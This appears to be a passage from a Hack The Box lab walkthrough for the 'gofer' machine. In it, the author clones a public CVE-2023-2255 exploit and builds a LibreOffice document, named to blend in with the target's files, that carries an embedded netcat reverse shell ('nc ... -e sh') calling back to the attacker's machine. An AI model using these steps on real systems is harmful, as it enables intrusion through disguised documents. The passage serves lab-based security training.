CVE-2023-2255
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git ; cd CVE-2023-2255
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0
receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
resolving deltas: 100% (2/2), done.I will first download the exploit to Kali
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --help
usage: CVE-2023-2255.py [-h] --cmd CMD [--output OUTPUT]
CVE-2023-2255
options:
-h, --help show this help message and exit
--cmd CMD Command to execute
--output OUTPUT Output filenameThe usage appears to be simple
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'nc 10.10.14.20 9999 -e sh' --output design.odt
File design.odt has been created !I named the payload design.odt to blend in to the organization’s core service
The output file has an embedded Netcat reverse shell
Payload is ready for delivery